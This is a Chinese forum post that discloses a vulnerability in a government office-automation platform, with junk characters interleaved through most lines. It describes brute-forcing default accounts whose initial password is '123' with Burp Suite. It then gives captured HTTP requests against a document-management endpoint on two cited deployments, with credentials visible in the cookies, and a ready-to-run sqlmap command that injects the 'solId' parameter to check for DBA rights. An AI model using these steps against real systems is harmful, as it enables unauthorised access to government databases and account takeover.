|
% L& O+ u, p2 |& ^0 r& d9 r$ z
6 n% O7 q' V1 l+ U+ k7 V
2 U6 k5 C9 v x a7 c5 {$ [% Y6 r; s; w- Q0 t- _( H
平台简介:. @. F/ B" ~: w+ M2 ~2 }2 P3 P
0 S' m3 \0 W; u4 B6 B ^9 {. {- Q+ m* _# b$ [
$ A" Q/ F" M. S
( P5 f" ?1 c& {0 \, F- c! s0 f
, q$ x* d+ M+ k: c 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
3 V: Z6 b& Z6 \ @! m, a; M
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
3 C/ z2 C- U5 O/ h) s
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
4 R3 Q$ N3 l% A) G0 B # ?* [/ c" ~- s& o y$ A
: k; x2 W0 }3 j" Z6 Y4 O
' ^8 ^" d" X. i! ? 2 `( ?& E" B; Z& d
% _! l: u2 R3 H) |& \: ^, a9 V: b 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:& T# V2 v' }' ]# I1 M& M& _
I ~$ d" O% O) x9 [$ X* J; j0 g- v$ X7 z, `" U$ [$ |4 W1 T
; ]1 M# W! I& x8 ?- F* w. n
6 {* B# l" y5 n; \* S B
1 s, R- X# [9 L$ ]. U4 L
http://1.1.1.1:7197/cap-aco/#(案例2-)
! `/ j6 V0 Y, U) W+ g9 o& k
& I* j- Q( N, Y! g0 n# r# U0 K/ g' A! k5 R+ u' y( b: p2 d
http://www.XXOO.com (案例1-官网网站)" \+ q5 H6 b8 ^/ U: H
7 b @1 y$ {' C
* v6 q/ g; S. O5 V
5 x5 J9 |3 f% d( G4 j9 B; E
; w4 s+ o0 q# t5 _% o. Z6 `" Y) D. n9 j
漏洞详情:# ^4 Y6 Q$ Y7 ^0 E. w: _
1 G" S$ H4 {+ N2 M, M
4 m: h% ~, E/ L7 D( b
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试* K0 ^& v/ Z5 A1 S4 D# k7 Y
; e# h. F1 s# y2 z2 m* k% q( p$ k* {
, m, u: M2 v" N6 l$ B 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
# x2 Y- H5 r; V% i( j+ N2 P g 6 w, \! v' Y& z# _# d7 x N
( q. J- W' }9 X5 B 2 h/ S7 }0 C3 E! Y
i5 H/ G" x0 L3 t5 {' Q
; M2 s6 V9 h# l. o8 _
 3 C* y9 S! {. f2 e" a1 r3 G
5 o" T" R1 ~: J* u0 s: S* M7 g
7 r( E! t& Y' F' s6 b status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
. t* h* l1 W8 _9 P# O; O! g/ D
% ~7 n8 U" Y+ g$ L# `! g6 X; F
! w* A& g# N% d' @2 N$ b j- e5 j) ? 1、案例1-官方网站! A9 h- d' S& u. ]
# K, A8 J" J+ L! }# o8 b
+ ~% q8 T$ x8 S+ o- Z& q1 _% j GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
! ?4 X2 y4 k( h$ c: Z
7 g. I! V, }; @$ t
- ^7 ] O& }7 {- X& w1 S7 B Host: www.XXOO.com2 ?9 C+ @) H% s+ e# e: P( H
9 `- l* m5 d* v: y: _2 @' E7 g% z! H+ `' ~
Proxy-Connection: Keep-Alive& i) K* b2 \$ z; U8 z: m1 ]
( e. r1 }) L% n+ q& I$ ^1 d! e/ F7 v5 Q1 l0 }1 @2 V+ F5 d) E
Accept: application/json, text/javascript, */*; q=0.01
# ~2 |) `% Q$ b: M6 _ ! M2 p( P: J: D9 F. m* U
) Z; b' |6 R6 x. e) I/ a Accept-Language: zh-CN
3 \: F, Q6 E7 f9 o) F; I
8 s7 _. m8 R1 o6 I2 i
+ G7 e* d2 @' N! M; `9 O Content-Type: application/json5 }9 a! ~' P( f: j4 ~' s/ g( L
% E7 P2 ?( \' j" v4 ] w
+ E8 x5 ~8 F: W' h User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
m. ` {5 k+ L* R% f4 m# f
6 g, G) {6 c+ e8 `; L6 S
, d( W) I5 C. w6 a X-Requested-With: XMLHttpRequest) E, ?% d( r+ s( D' `2 T" ]2 t* V: }
( b' v4 i$ T" _9 \! c
9 y7 i1 V6 G- P$ O+ a7 b. u
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
5 W8 \7 |4 l9 Q a( `
S5 ?8 O. x1 ]5 k/ N
; X* D6 t; M% ~ Accept-Encoding: gzip, deflate, sdch4 m* b/ b! O [, q9 [1 z& P( b
( {% K$ u3 q( { F! [
- x$ I0 c! f! J* J% q6 c7 C Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e0 k; F5 N8 e( Y
1 D c. Z: O0 Y0 m
) Q: j+ t! i# b 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
0 k" j( r0 l0 H6 V3 u8 n7 b7 j - p: J$ a/ N! d9 q' u
7 v4 T! A, ~! H# [7 c" }& Y 
o+ T" U+ A% P' A# \$ `/ l4 r # R0 s8 ]0 D. Q# c
. b! q0 H/ T' U7 ?$ ]9 w& e3 ]
 1 e1 K! R& ^7 ~& }3 P
& t" ^9 ^- m* K2 E p
, i8 i+ t# i+ ], y2 V * [% W' i9 o7 u. x% ^. ]7 C9 l8 I
: [. W8 a1 R, Z: a4 Q, d8 S6 Z% j% P5 n& e
9 r" q* j; P9 S+ V) C ' P/ U! q, [+ }( u+ j& ?) l* E
. h) Q8 w! l% A: E0 d9 B% ]/ M
) a' {% l. E5 i
" B3 r r6 Q6 L1 u3 x- }, c. Z3 ^
) f% W6 J4 M* z 2、案例2-某天河云平台, Z1 E2 E6 ^ w5 L3 s
+ _9 I) Q( q1 P) }, M I
; A& t1 {9 c/ c T, \& O# g/ _' x GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
1 K1 Q; V, z( O
a/ r$ p0 f, Q/ }& F( m+ s
" O$ Y, t9 r8 |- ~ Host: 1.1.1.:7197. R7 Z/ w$ Z. f& i' Q; F' d' J
1 W G/ B* Z1 x+ h( P4 w
/ ^3 o: N8 m, j' } Accept: application/json, text/javascript, */*; q=0.01
# D' B* Q: M, e$ p' c$ [
7 W$ B- x0 s% P# }) r: I
1 H4 \) h, W. a( z: t3 {9 D; u X-Requested-With: XMLHttpRequest- |( D' K4 U/ A6 x; p* v! k
0 i6 }+ }% c) Z/ u8 o W
4 @% h% M w4 c3 E User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0. C' P8 ]' n$ U$ b+ q
, \% R$ ~8 n y! x# O+ _
' S) F# I/ V6 L' r' ` Content-Type: application/json
( D% R; w/ o# y; p: k9 p+ Y
% b$ p$ O8 R; T$ k( U( |: N7 W0 E: a3 u
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=10082 N( `5 w; z' d, [# F5 ^& ~- c3 R+ Q' U
" y. D- l6 w. |- E Y
+ B' i* K" W: _( z, @# q+ _
Accept-Language: zh-CN,zh;q=0.8
' S1 S1 B n# ]' N+ n' f$ m( v + j0 H6 o% @8 y6 J, T$ o' @
, H. c/ n0 \& v9 j
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
+ ?3 w% Q, i! B& @4 e: D+ K3 w3 h ( k7 y; e- q, o( ?+ X0 W& l, p, s/ K! ^
+ y3 p7 S1 D0 m- t7 m Connection: close
; A0 T, x- k! ^* J. h3 H; g, T
9 ~) d3 g W2 [
7 p$ |; w( B' J8 C6 O; y6 o3 D 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
5 b1 m. q! e; _. f
. O W$ I7 ^; O# Y) E
. t! i) x( m9 b Q 
) M9 j+ N# J: d3 _- J , x. Q2 Q: f! o6 L8 l- r
0 |* l1 j: f# m9 R
: D8 t- T. U) G% G& Y9 {- }
| 
发表于 2018-10-20 20:15:17
收藏
支持
反对